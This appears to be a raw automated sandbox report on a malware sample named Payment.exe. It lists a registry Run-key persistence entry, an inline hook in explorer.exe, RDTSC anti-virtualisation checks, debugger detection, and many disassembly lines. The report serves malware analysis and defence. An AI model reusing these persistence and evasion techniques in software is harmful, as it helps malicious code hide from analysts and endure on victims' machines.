Source: Payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_003F6F42
Source: Payment.exe	Static PE information: section name:
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_003F3A35 push ecx; ret 0_2_003F3A48
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CADE2D push ecx; ret 0_2_03CADE40

Source: C:\Windows\SysWOW64\netsh.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VPZLD8LXUB
Source: C:\Windows\SysWOW64\netsh.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VPZLD8LXUB

      Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe	User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xE3 0x34
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Payment.exe	RDTSC instruction interceptor: First address: 0000000003873D1C second address: 0000000003873D22 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment.exe	RDTSC instruction interceptor: First address: 0000000003873F86 second address: 0000000003873F8C instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000537244 second address: 000000000053724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000005374AE second address: 00000000005374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C87B60 rdtsc 0_2_03C87B60
Source: C:\Users\user\Desktop\Payment.exe	API coverage: 6.8 %
Source: C:\Windows\explorer.exe TID: 4408	Thread sleep time: -34000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 1044	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Payment.exe	API call chain: ExitProcess graph end node graph_0-28961
Source: C:\Users\user\Desktop\Payment.exe	Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Payment.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C87B60 rdtsc 0_2_03C87B60
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C9A3E0 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_03C9A3E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_003F5C6B _memset,IsDebuggerPresent, 0_2_003F5C6B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_003F6F42
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_003F6F42
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D113D8 mov eax, dword ptr fs:[00000030h] 0_2_03D113D8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h] 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C99BC7 mov eax, dword ptr fs:[00000030h] 0_2_03C99BC7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CE3BD8 mov eax, dword ptr fs:[00000030h] 0_2_03CE3BD8
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8ABFE mov eax, dword ptr fs:[00000030h] 0_2_03C8ABFE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8ABFE mov eax, dword ptr fs:[00000030h] 0_2_03C8ABFE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h] 0_2_03C96399
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h] 0_2_03C96399
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h] 0_2_03C96399
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D19B89 mov eax, dword ptr fs:[00000030h] 0_2_03D19B89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D19B89 mov ecx, dword ptr fs:[00000030h] 0_2_03D19B89
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h] 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h] 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h] 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h] 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h] 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD63A6 mov eax, dword ptr fs:[00000030h] 0_2_03CD63A6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C54BB4 mov edi, dword ptr fs:[00000030h] 0_2_03C54BB4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h] 0_2_03CD4BBE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h] 0_2_03CD4BBE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h] 0_2_03CD4BBE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h] 0_2_03CD4BBE
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8BBBC mov eax, dword ptr fs:[00000030h] 0_2_03C8BBBC
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h] 0_2_03D143A4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h] 0_2_03D143A4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h] 0_2_03D143A4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h] 0_2_03D143A4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D11351 mov eax, dword ptr fs:[00000030h] 0_2_03D11351
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D28356 mov eax, dword ptr fs:[00000030h] 0_2_03D28356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h] 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h] 0_2_03C81356
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C9536C mov eax, dword ptr fs:[00000030h] 0_2_03C9536C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C9536C mov eax, dword ptr fs:[00000030h] 0_2_03C9536C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D1E362 mov eax, dword ptr fs:[00000030h] 0_2_03D1E362
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h] 0_2_03C6E370
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h] 0_2_03C6E370
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h] 0_2_03C6E370
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8AB0C mov eax, dword ptr fs:[00000030h] 0_2_03C8AB0C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8AB0C mov eax, dword ptr fs:[00000030h] 0_2_03C8AB0C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h] 0_2_03C5C330
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h] 0_2_03C5C330
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h] 0_2_03C5C330
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C51AC0 mov eax, dword ptr fs:[00000030h] 0_2_03C51AC0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h] 0_2_03C822C3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h] 0_2_03C822C3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h] 0_2_03C822C3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov ecx, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h] 0_2_03CEB2C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D112CA mov eax, dword ptr fs:[00000030h] 0_2_03D112CA
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C512F4 mov eax, dword ptr fs:[00000030h] 0_2_03C512F4
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8F289 mov eax, dword ptr fs:[00000030h] 0_2_03C8F289
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h] 0_2_03C8328D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h] 0_2_03C8328D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h] 0_2_03C8328D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD3284 mov eax, dword ptr fs:[00000030h] 0_2_03CD3284
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD3284 mov eax, dword ptr fs:[00000030h] 0_2_03CD3284
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C69AA0 mov eax, dword ptr fs:[00000030h] 0_2_03C69AA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C69AA0 mov eax, dword ptr fs:[00000030h] 0_2_03C69AA0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C7B2A0 mov eax, dword ptr fs:[00000030h] 0_2_03C7B2A0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h] 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h] 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h] 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h] 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C742B0 mov ecx, dword ptr fs:[00000030h] 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D11243 mov eax, dword ptr fs:[00000030h] 0_2_03D11243
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84A5B mov eax, dword ptr fs:[00000030h] 0_2_03C84A5B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C84A5B mov eax, dword ptr fs:[00000030h] 0_2_03C84A5B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D11A71 mov eax, dword ptr fs:[00000030h] 0_2_03D11A71
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D20A74 mov eax, dword ptr fs:[00000030h] 0_2_03D20A74
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h] 0_2_03C8EA6E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h] 0_2_03C8EA6E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h] 0_2_03C8EA6E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h] 0_2_03C55275
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h] 0_2_03C55275
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h] 0_2_03C55275
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h] 0_2_03C55275
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h] 0_2_03C55275
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C53200 mov eax, dword ptr fs:[00000030h] 0_2_03C53200
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h] 0_2_03C58209
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h] 0_2_03C58209
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h] 0_2_03C58209
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h] 0_2_03C59210
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h] 0_2_03C59210
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h] 0_2_03C59210
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h] 0_2_03C59210
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D23A05 mov eax, dword ptr fs:[00000030h] 0_2_03D23A05
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D23A05 mov eax, dword ptr fs:[00000030h] 0_2_03D23A05
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h] 0_2_03CD6A16
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h] 0_2_03CD6A16
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h] 0_2_03CD6A16
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h] 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D111D2 mov eax, dword ptr fs:[00000030h] 0_2_03D111D2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C869C0 mov ecx, dword ptr fs:[00000030h] 0_2_03C869C0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h] 0_2_03C551E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C551E0 mov ecx, dword ptr fs:[00000030h] 0_2_03C551E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h] 0_2_03C551E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h] 0_2_03C551E0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C679F7 mov eax, dword ptr fs:[00000030h] 0_2_03C679F7
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h] 0_2_03CD7194
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h] 0_2_03CD7194
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h] 0_2_03CD7194
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5A9A6 mov eax, dword ptr fs:[00000030h] 0_2_03C5A9A6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5A9A6 mov eax, dword ptr fs:[00000030h] 0_2_03C5A9A6
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C819B0 mov eax, dword ptr fs:[00000030h] 0_2_03C819B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03D11151 mov eax, dword ptr fs:[00000030h] 0_2_03D11151
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h] 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C8214F mov eax, dword ptr fs:[00000030h] 0_2_03C8214F
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C53158 mov ecx, dword ptr fs:[00000030h] 0_2_03C53158
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h] 0_2_03C5B171
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h] 0_2_03C5B171
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5B171 mov eax, dword ptr fs:[00000030h] 0_2_03C5B171
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5397E mov eax, dword ptr fs:[00000030h] 0_2_03C5397E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5397E mov eax, dword ptr fs:[00000030h] 0_2_03C5397E
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5B101 mov eax, dword ptr fs:[00000030h] 0_2_03C5B101
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C5B101 mov eax, dword ptr fs:[00000030h] 0_2_03C5B101
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h] 0_2_03C54101
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h] 0_2_03C54101
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C54101 mov eax, dword ptr fs:[00000030h] 0_2_03C54101
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h] 0_2_03C87110
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h] 0_2_03C87110
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C87110 mov eax, dword ptr fs:[00000030h] 0_2_03C87110
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_03C6F11B mov eax, dword ptr fs:[00000030h] 0_2_03C6F11B
